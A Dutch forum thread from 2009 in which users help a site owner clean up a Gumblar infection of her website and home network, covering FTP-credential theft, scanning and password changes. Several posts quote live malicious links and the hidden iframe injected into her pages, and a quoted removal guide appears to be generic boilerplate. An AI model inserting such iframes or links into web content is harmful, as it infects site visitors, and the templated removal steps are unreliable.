1 |
Die pagina doet niks bij mij. Niet openen, maar mn scanner zegt ook niks.quote:Op maandag 10 augustus 2009 @ 00:58 schreef Juicyhil het volgende:
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php
Gaat je virusscanner dan ook stoer doen?
Hij klaagt namelijk wel over een iframe
Arghquote:Op maandag 10 augustus 2009 @ 00:59 schreef mistermaniac het volgende:
Je bent niet de enige:
Vreemd virus op mijn website?
IP's blokkeren op ftp server
Joomla als CMS?
misschien het probleem kan zijnquote:Op maandag 13 juli 2009 @ 20:42 schreef AquaMaryn het volgende:
Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
Dat gaat dus enkel werken als je ook het virus verwijderdquote:Op maandag 10 augustus 2009 13:59 schreef St4ck3r het volgende:
Gumblar virus!
Veel last van hier (ISP) ff je FTP gegevens wijzigen..
Ik las het op 3 websites. Te belachelijk ookquote:Op dinsdag 11 augustus 2009 11:13 schreef MissBliss het volgende:
Format? Neeeeeeeeeeeeeeeeeeeee!
Oh, dit ga ik zo wel even doen dan.quote:Op dinsdag 11 augustus 2009 @ 11:30 schreef Qwea het volgende:
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen:
1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)
2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.
3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.
4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.
ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
quote:Firstly, find another computer that is not infected. Go to your host’s control panel and change the password. If you are running a database driven site, change your database user passwords too. Backup your database – it is not clear at the moment if the database is at risk. Then, the safest option, is to delete everything in your public_html directory (or equivalent) plus html files in the tmp/webalizer and tmp/awstats directories. Ok, you lose you stats, this is not the end of the world though.
On your computer install Avast. Update Windows. If you struggle to get to the website, that’s the virus blocking you. Download from another pc, copy to media, then install from there. Update and run, run in safe mode, clear you temp data (CCleaner has always been handy for this) and run it again. Make sure you pc is clear. Reboot and run again (in case pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows Restore and ensure all restore points are trashed (should be automatic).
When you computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about/tested years ago). I suggest that web masters stop saving FTP data on their pc’s completely. Better safe than very very sorry. Remember, Dreamweaver, Link Crawlers and Site Map generators, Photo Editors, Album Creaters and even some notepad tools (like PSPad) store FTP information.
Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannenquote:To remove Gumblar, you must first stop any Gumblar processes that are running in your computer's memory. To stop all Gumblar processes, press CTRL+ALT+DELETE to open the Windows Task Manager. Click on the "Processes" tab, search for Gumblar, then right-click it and select "End Process" key.
To delete Gumblar registry keys, open the Windows Registry Editor by clicking on the Windows "Start" button and selecting "Run." Type "regedit" into the box and click "OK." Once the Registry Editor is open, search for the registry key "HKEY_LOCAL_MACHINE\Software\Gumblar." Right-click this registry key and select "Delete."
Finally, to completely get rid of Gumblar, you must manually remove other Gumblar files. These Gumblar files can be in the form of EXE, DLL, LSP, TOOLBAR, BROWSER HIJACK, and/or BROWSER PLUGIN. For example, Gumblar might create a file like
%PROGRAM_FILES%\Gumblar\Gumblar.exe. Locate and remove these files.
Oh dit wordt een dagtaakquote:Op dinsdag 11 augustus 2009 @ 11:38 schreef Qwea het volgende:
nog een stukje
[..]
Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen
Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.quote:Op dinsdag 11 augustus 2009 11:41 schreef MissBliss het volgende:
Avast heeft vannacht gescand, maar hij is (weer) vastgelopen, nu scant ie weer, maar hij is pas op 58%.
Ik probeer dat McAfee ook wel!
Ja, we hebben idd een netwerkYay.
[..]
Oh dit wordt een dagtaak
Ja, dat ga ik zo maar doen.quote:Op dinsdag 11 augustus 2009 @ 11:42 schreef Qwea het volgende:
[..]
Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.
quote:Op dinsdag 11 augustus 2009 11:46 schreef MissBliss het volgende:
[..]
Ja, dat ga ik zo maar doen.
Naja, Re heeft 1 vd laptops mee naar zn werkIk zal hem even bellen
Gebeld: hij is ook geinfecteerd
jaquote:Op dinsdag 11 augustus 2009 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
Dat heb ik al gezegd ja.quote:Op dinsdag 11 augustus 2009 @ 12:01 schreef Qwea het volgende:
[..]Heeft hij die laptop ook op het bedrijsnetwerk aangesloten?
Dan mogen ze wel snel actie ondernemen
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou wasquote:Op dinsdag 11 augustus 2009 @ 12:02 schreef St4ck3r het volgende:
<iframe data-src="http://c6h.at:8080/ts/in.cgi?pepsi138" style="visibility:hidden;" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
Bij MM op het werk issie ookquote:Op dinsdag 11 augustus 2009 12:10 schreef MissBliss het volgende:
[..]
Dat heb ik al gezegd ja.
[..]
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
Het is mn eigen computer ja. Ik durf dit nietquote:Op dinsdag 11 augustus 2009 @ 12:11 schreef CantFazeMe het volgende:
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.
Stap 1:
Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis
Systeem ScanOpen HijackThis. Klik op “Do a systemscan and save a logefile” Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log” Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply. Na het kopieren van de log het programa afsluiten.
Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
call gelogd bij helpdesk, responsetijd 3 uurquote:Op dinsdag 11 augustus 2009 12:03 schreef Qwea het volgende:
[..]
jahier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.
Ik vraag me af, hoe dit concreet opgelost gaat worden.
Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...
Ga je dat ooit stoppen?
3u?quote:Op dinsdag 11 augustus 2009 12:20 schreef Re het volgende:
[..]
call gelogd bij helpdesk, responsetijd 3 uur, dus ik merk het wel
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.quote:Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.quote:Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
quote:Op dinsdag 11 augustus 2009 @ 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple![]()
Nee, dan blijf ik er vanaf!quote:Op dinsdag 11 augustus 2009 @ 12:24 schreef Qwea het volgende:
[..]
Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.
Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
quote:Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple![]()
Flash en adobe reader.quote:Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple![]()
quote:Wat doet Gumblar?
Het doel van de malware is om zoveel mogelijk computers te besmetten en gevoelige informatie van de deze computers te stelen. Gumblar gaat na infectie van een computer op zoek naar zogenaamde FTP-inloggegevens. FTP wordt vaak gebruikt om websites te updaten. Deze gegevens worden door Gumblar gebruikt om toegang te krijgen tot de content van allerlei (goed bedoelde) websites. Webpagina's van deze sites worden vervolgens aangepast. Bezoek je zo’n site, dan krijg je deze nieuwe malware aangeboden. Dit gebeurt opnieuw via de kwetsbare plekken in Adobe PDF Reader en Adobe Flash wanneer je zo'n website bezoekt. Op deze manier worden computers geïnfecteerd met de Gumblar code.
Ook worden er aanpassingen gedaan in Internet Explorer, de webbrowser. Deze aanpassingen zorgen ervoor dat zoekresultaten in Google worden gemanipuleerd en verwijzen naar sites waarmee malware verspreid wordt.
Naast het manipuleren van Google-zoekresultaten en het stelen van FTP-inloggegevens zal een besmette computer:
Ik vraag me af waarom vista niet.quote:Affected Platforms:
The malware affecting PCs targets prevalent Microsoft platforms:
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003
Dat ding kan zich werkelijk overal hebben ingenesteld.quote:Op dinsdag 11 augustus 2009 12:26 schreef MissBliss het volgende:
[..]
Nee, dan blijf ik er vanaf!
Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
Nee, dat dan weer niet.quote:Op dinsdag 11 augustus 2009 @ 12:31 schreef Qwea het volgende:
[..]
Dat ding kan zich werkelijk overal hebben ingenesteld.
Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe nietquote:Op dinsdag 11 augustus 2009 12:32 schreef MissBliss het volgende:
Ok, ook niet meer googlen in IE dus
Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
Oh sorryquote:Op dinsdag 11 augustus 2009 @ 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Download ff avast. Ik snap het niet he...quote:Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Ok.quote:Op dinsdag 11 augustus 2009 @ 12:34 schreef Qwea het volgende:
[..]
Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
Ja, goed idee!quote:Op dinsdag 11 augustus 2009 @ 12:36 schreef Qwea het volgende:
MB? Is het handig om de TT te wijzigen?Je weet nu immers wat het probleem precies is.
Ik zeg maar wat hoor
Ooh, en zet je internet beveiliging van avast (iets met surfen ofzo in de instellingen) op hoogquote:
je bent toch niet voor jan snot modquote:Op dinsdag 11 augustus 2009 12:37 schreef MissBliss het volgende:
[..]
Ja, goed idee!
Zal ik het zelf doen?
|
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |